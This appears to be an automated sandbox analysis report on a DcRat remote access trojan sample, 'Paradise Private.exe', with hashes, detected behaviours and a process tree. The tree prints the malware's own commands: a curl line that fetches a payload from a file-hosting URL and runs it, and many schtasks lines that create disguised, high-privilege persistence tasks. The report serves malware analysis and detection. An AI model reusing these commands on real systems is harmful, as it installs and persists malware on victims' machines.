Analysis
-
max time kernel
143s -
max time network
150s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
10-12-2024 11:15
Static task
static1
Behavioral task
behavioral1
Sample
Paradise Private.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
Paradise Private.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Paradise Private.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
Paradise Private.exe
-
Size
855KB
-
MD5
df367e723dc5759cdad30841910cd6af
-
SHA1
eb6105e8f2462746108e94543e684c8d6a587dbb
-
SHA256
a29663d874e5fba50215d6966591407d6c9d264371ec0e726bdf5a902cf11156
-
SHA512
21f29b03a607ba8e3910ed27e802cf61db82dda0c1f3e9772127509dfd9eb7e81778463f47cbe4727116792eed83e11b91dc7fb72e455eb3b621201f9853dbb0
-
SSDEEP
12288:KvGAa5J2tubG6rOH7Fso6veRSN2ff+zOe9egX7AlGXynGnIr9BqiXb1FP:KvGAMAubGeo60OegX7AoXyn6m7Vj
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1300 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1992 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1424 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2328 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4720 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3420 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2240 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3636 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2084 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3580 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1536 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2840 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2232 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4980 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 236 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3140 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2460 4484 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 100 4484 schtasks.exe 92 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation client.exe Key value queried \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe -
Executes dropped EXE 3 IoCs
pid Process 1320 client.exe 4072 chainreviewwinrefSvc.exe 4648 sihost.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Common Files\DESIGNER\wininit.exe chainreviewwinrefSvc.exe File created C:\Program Files\Common Files\DESIGNER\56085415360792 chainreviewwinrefSvc.exe File created C:\Program Files\dotnet\host\fxr\8.0.2\spoolsv.exe chainreviewwinrefSvc.exe File created C:\Program Files\dotnet\host\fxr\8.0.2\f3b6ecef712a24 chainreviewwinrefSvc.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Speech\client.exe curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2068 PING.EXE -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\Local Settings client.exe Key created \REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000_Classes\Local Settings chainreviewwinrefSvc.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2068 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2240 schtasks.exe 1536 schtasks.exe 2840 schtasks.exe 1424 schtasks.exe 2328 schtasks.exe 4720 schtasks.exe 236 schtasks.exe 1992 schtasks.exe 2232 schtasks.exe 4980 schtasks.exe 3140 schtasks.exe 2460 schtasks.exe 100 schtasks.exe 1300 schtasks.exe 3420 schtasks.exe 3580 schtasks.exe 3636 schtasks.exe 2084 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3284 Paradise Private.exe 3284 Paradise Private.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe 4072 chainreviewwinrefSvc.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4072 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 4648 sihost.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 3284 wrote to memory of 732 3284 Paradise Private.exe 84 PID 3284 wrote to memory of 732 3284 Paradise Private.exe 84 PID 3284 wrote to memory of 2112 3284 Paradise Private.exe 85 PID 3284 wrote to memory of 2112 3284 Paradise Private.exe 85 PID 732 wrote to memory of 3920 732 cmd.exe 86 PID 732 wrote to memory of 3920 732 cmd.exe 86 PID 3284 wrote to memory of 3448 3284 Paradise Private.exe 89 PID 3284 wrote to memory of 3448 3284 Paradise Private.exe 89 PID 3448 wrote to memory of 1320 3448 cmd.exe 90 PID 3448 wrote to memory of 1320 3448 cmd.exe 90 PID 3448 wrote to memory of 1320 3448 cmd.exe 90 PID 1320 wrote to memory of 1456 1320 client.exe 93 PID 1320 wrote to memory of 1456 1320 client.exe 93 PID 1320 wrote to memory of 1456 1320 client.exe 93 PID 3284 wrote to memory of 1112 3284 Paradise Private.exe 94 PID 3284 wrote to memory of 1112 3284 Paradise Private.exe 94 PID 1456 wrote to memory of 2740 1456 WScript.exe 98 PID 1456 wrote to memory of 2740 1456 WScript.exe 98 PID 1456 wrote to memory of 2740 1456 WScript.exe 98 PID 2740 wrote to memory of 4072 2740 cmd.exe 100 PID 2740 wrote to memory of 4072 2740 cmd.exe 100 PID 4072 wrote to memory of 3436 4072 chainreviewwinrefSvc.exe 119 PID 4072 wrote to memory of 3436 4072 chainreviewwinrefSvc.exe 119 PID 3436 wrote to memory of 2216 3436 cmd.exe 121 PID 3436 wrote to memory of 2216 3436 cmd.exe 121 PID 3436 wrote to memory of 2068 3436 cmd.exe 122 PID 3436 wrote to memory of 2068 3436 cmd.exe 122 PID 3436 wrote to memory of 4648 3436 cmd.exe 124 PID 3436 wrote to memory of 4648 3436 cmd.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
cURL User-Agent 1 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 4 curl/8.7.1
Processes
-
C:\Users\Admin\AppData\Local\Temp\Paradise Private.exe"C:\Users\Admin\AppData\Local\Temp\Paradise Private.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe2⤵
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\system32\curl.execurl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe3⤵
- Drops file in Windows directory
PID:3920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:2112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\Speech\client.exeC:\Windows\Speech\client.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt/chainreviewwinrefSvc.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\HETsrnRlyv.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\system32\chcp.comchcp 650018⤵PID:2216
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2068
-
-
C:\Users\All Users\sihost.exe"C:\Users\All Users\sihost.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4648
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe2⤵PID:1112
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\System.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1300
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1424
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\All Users\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3420
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files\dotnet\host\fxr\8.0.2\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2240
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\dotnet\host\fxr\8.0.2\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3636
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Program Files\dotnet\host\fxr\8.0.2\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Common Files\DESIGNER\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Common Files\DESIGNER\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Program Files\Common Files\DESIGNER\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2840
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\ComponentCrt\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2232
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\ComponentCrt\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\ComponentCrt\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 6 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3140
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvc" /sc ONLOGON /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2460
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 5 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:100
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98B
MD54dafd9e9509ac96be6aa5baec659da4d
SHA1a091552663ddea89536560f232b8339f318c9cbc
SHA2560c53b640295abd25e8387957941e29f5c4e765376365409164ac39e3365a6ccf
SHA512d290c162347e236e0e197c52afc4f4b33f1eba2498dfe2ad86c414c87ab70c9fbbd2132cd08bfb4137e8555a095ca9acb6675727a4a5f65ccc46141c16698132
-
Filesize
1.8MB
MD511cca9e2c6dc9c2a728b89e7314ec26a
SHA158aec3b662a1c4e8b43cc454d90813ac89b5e612
SHA256300072795259e7b2baa69a7a3d19ffea1844dffc391e710c654aa1b66b0e2197
SHA512fb1fcff1c94e73b1227f65b237639e25604d614cfe365f2108bbbfdb489b97410fdc17411b8f00fc5b8f57d51080b4496010537a6a4ff9b15b7bdd24f89d0df7
-
Filesize
207B
MD5b292d233456b16f26abc1aa07c9f5de0
SHA17b025705136101b5618d81d8ebf472335eebde43
SHA256e75d13d4b079fafbd413fa8182c270f1f0f41b1b19b3469db12de226fed67b2d
SHA5121c9c3846ab0e392dc6833de2a9238c91b6042b5095521196a3ceae8830edf7fb6d73118ed023b2e2daf287a48084fa8ee40241248a231cf668d5cc5e8f947ee4
-
Filesize
157B
MD53abedb657a43d8a141fa5884b387018b
SHA1f4e9e9fff16126c10758c861fc22e54ad6a697a5
SHA256aaecbd06eb59a5501dc2eeb057a4b68ca591c95d6e776eb77f4f8796e5e0d8f3
SHA512ee5e92f5be01359df5cd4db17c71ca4f78935838baf06a5a3f9ed38b335987ebc9a7fdf88b93cad0c7439b412c40e3350ab1157e5c198a2d7958a746478073a3
-
Filesize
2.1MB
MD5bf4f13d82d217ed69d80124c50d9441c
SHA1b7ee7d109f61371342e924e6a0c3505347dd318f
SHA25651890bfc6f223014ff16f4bfa6ace8e2d2ec3c81eb6965406813b9ca32b08508
SHA5121ba17e55d6d1f6fda99daffe3f11f995d5e8434901b2aea9105728ccbff1b81727d96bf8811a62e8367fca0ec23bdea331165b001088b183281164269668d2f4